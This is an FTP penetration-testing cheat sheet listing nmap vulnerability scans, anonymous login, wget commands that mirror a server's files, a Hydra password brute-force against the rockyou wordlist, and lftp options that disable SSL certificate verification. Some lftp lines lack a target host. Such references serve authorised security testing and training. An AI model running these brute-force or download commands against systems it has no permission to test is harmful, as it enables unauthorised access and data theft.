
21 FTP Cheat Sheet

General approach to basic checks relating to FTP

Last updated: May 4th, 2023

Automated Recon

The following command can be used to automate the reconnaissance process on an FTP server:

nmap --script="ftp*" -p 21 x.x.x.x

This command will run a script that checks for potential vulnerabilities on the FTP server.

Anonymous Login

If anonymous login is enabled on an FTP server, the following syntax can be used to log in:

ftp x.x.x.x

This will log in anonymously and display a list of available commands.

Recursive download

There are various ways to download files recursively from an FTP server, such as:

wget -m ftp://anonymous:anonymous@x.x.x.x #Download all
wget -m --no-passive ftp://anonymous:anonymous@x.x.x.x #Download all
wget -r ftp://anonymous:@x.x.x.x:30021

The first two commands download all files from the FTP server using wget. The third command downloads files recursively from the specified directory.


The following command can be used to perform a brute-force attack on an FTP server:

hydra -t 4 -l user -P /usr/share/wordlists/rockyou.txt -vV x.x.x.x ftp

This command uses the Hydra tool to try various username and password combinations to gain access to the FTP server.


The lftp command is a powerful FTP client that can be used to troubleshoot and manage FTP connections:

lftp -u ftpuser,ftppassword sftp://
lftp -u anonymous sftp://
lftp -u anonymous

lftp -e "set ftp:passive-mode false" -u admin,admin
lftp -e 'set ftp:passive-mode true' -u anonymous
lftp -e "mirror -R /backups ./conf-backups" -u ftpuser,ftppassword sftp://
set ftp:ssl-allow false
set ftp:passive-mode off
set ssl:verify-certificate no

The above commands can be used to log in to an FTP server, troubleshoot connection issues, and manage backups. The lftp tool also supports various configuration options, such as setting the passive mode or disabling SSL certificate verification.